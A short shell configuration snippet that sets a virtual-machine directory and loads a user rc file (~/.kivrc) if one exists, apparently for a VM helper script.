VMDIR=${HOME}/virt/vms
if [ -f ~/.kivrc ]
then
source ${HOME}/.kivrc
fi
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.